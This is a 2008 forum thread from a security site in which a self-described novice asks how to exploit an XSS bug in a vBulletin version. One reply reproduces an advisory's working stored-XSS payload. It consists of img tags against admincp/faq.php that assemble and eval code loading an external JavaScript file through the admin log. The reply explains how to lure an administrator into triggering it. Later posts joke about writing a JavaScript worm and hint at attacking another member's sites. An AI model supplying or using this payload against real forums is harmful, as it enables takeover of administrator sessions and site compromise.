 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 73
 Members: 0
 Total: 73
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
easy? |
|
 Posted: Thu Aug 07, 2008 4:30 pm |
 |
|
| Iplox |
| Active user |
 |
|
| Joined: Jul 29, 2008 |
| Posts: 28 |
|
|
|
 |
|
 |
|
|
|
|
|
| Posted: Thu Aug 07, 2008 6:31 pm |
|
|
| pexli |
| Valuable expert |
 |
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
|
|
|
|
| Posted: Thu Aug 07, 2008 6:54 pm |
|
|
| oniric |
| Advanced user |
|
|
| Joined: Jul 24, 2008 |
| Posts: 65 |
|
|
|
|
|
|
|
| There is an XSS bug in that version as Google says, or Secunia if you prefer. |
|
|
|
|
| Posted: Thu Aug 07, 2008 7:21 pm |
|
|
| Iplox |
| Active user |
|
|
| Joined: Jul 29, 2008 |
| Posts: 28 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Thu Aug 07, 2008 8:12 pm |
|
|
| oniric |
| Advanced user |
|
|
| Joined: Jul 24, 2008 |
| Posts: 65 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Thu Aug 07, 2008 8:22 pm |
|
|
| Iplox |
| Active user |
|
|
| Joined: Jul 29, 2008 |
| Posts: 28 |
|
|
|
|
|
|
|
| can you tell me how to us XSS, im a complete noob |
|
|
|
|
| Posted: Thu Aug 07, 2008 9:19 pm |
|
|
| oniric |
| Advanced user |
|
|
| Joined: Jul 24, 2008 |
| Posts: 65 |
|
|
|
|
|
|
|
| Uch, it's a big big big big topic, believe me. You should read something about it. It's really interesting, and very very creative. I built a Javascript worm once, very funny indeed ^_^ |
|
|
|
|
|
|
|
|
| Posted: Fri Aug 08, 2008 11:25 am |
|
|
| lenny |
| Valuable expert |
|
|
| Joined: May 15, 2008 |
| Posts: 275 |
|
|
|
|
|
|
|
Ok Iplox, basically it (roughly) involves you poisoning a page with javascript that you can then using this against other people in the form of a malicious attack.
The advisory basically explains this:
You need to execute the following HTML to "poision" the targets adminlog.
| Quote: | <html>
<body>
<img src="http://localhost/vB/upload/admincp/faq.php/0?do=<script>/*"
/>
<img
src="http://localhost/vB/upload/admincp/faq.php/1?do=*/a%3D'document.wri
'/*"
/>
<img
src="http://localhost/vB/upload/admincp/faq.php/2?do=*/b%3D'te(%22<scrip
t
'/*" />
<img
src="http://localhost/vB/upload/admincp/faq.php/3?do=*/c%3D'src=http://'
/*"
/>
<!--edit to match your data -->
<img
src="http://localhost/vB/upload/admincp/faq.php/4?do=*/d%3D'localhost/'/
*"
/>
<img src="http://localhost/vB/upload/admincp/faq.php/5?do=*/e%3D''/*"
/>
<img
src="http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't.js></scrip
'/*"
/>
<!-- end edit -->
<img
src="http://localhost/vB/upload/admincp/faq.php/7?do=*/g%3D't>%22)'/*"
/>
<img
src="http://localhost/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd
%2Be%2Bf%2Bg/*"
/>
<img src="http://localhost/vB/upload/admincp/faq.php/9?do=*/eval(h)/*"
/>
<img src="http://localhost/vB/upload/admincp/faq.php/a0?do=*/</script>"
/>
</body>
</html> |
Basically It just posions the adminlog entries and will execute any javascript file you point it to. You then need to convince the admin to visit the adminlog page, which in turn will render javascript include allowing you to include any javascript file.
The advisory dosen't explain what to do next (advisiories are designed for security professionals and as such are not guides.), but basically you need to craft a javascript file with the malicious code you want. |
|
|
|
|
|
|
|
|
| Posted: Fri Aug 08, 2008 12:36 pm |
|
|
| oniric |
| Advanced user |
|
|
| Joined: Jul 24, 2008 |
| Posts: 65 |
|
|
|
|
|
|
|
| So now you understand why I said it's necessary to be very creative ^_^ Also knowing javascript is extremely important! |
|
|
|
|
| Posted: Sun Aug 24, 2008 8:53 pm |
|
|
| Cmd19872002 |
| Beginner |
|
|
| Joined: Aug 24, 2008 |
| Posts: 1 |
|
|
|
|
|
|
|
Iplox you better watch what your trying todo. I am the owner of www.rscrackers.net (and procrackers.com/net) If you know whats good for you, you would stand clear of trying to sql inject any site.
~Cmd |
|
|
|
|
| Posted: Sun Aug 24, 2008 9:05 pm |
|
|
| lenny |
| Valuable expert |
|
|
| Joined: May 15, 2008 |
| Posts: 275 |
|
|
|
|
|
|
|
Sorry, i may have beaten him there. Look after your servers, serves you right for not keeping updated on security!
Anyway, no harm was done. |
|
Last edited by lenny on Mon Aug 25, 2008 10:26 am; edited 1 time in total |
|
|
|
| Posted: Mon Aug 25, 2008 9:52 am |
|
|
| gibbocool |
| Advanced user |
 |
|
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
|
|
|
|
lol!!  |
|
|
|
|
| Posted: Tue Sep 02, 2008 1:00 am |
|
|
| -AO- |
| Advanced user |
|
|
| Joined: Jul 15, 2008 |
| Posts: 205 |
| Location: United States |
|
|
|
|
|
|
Owned.
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
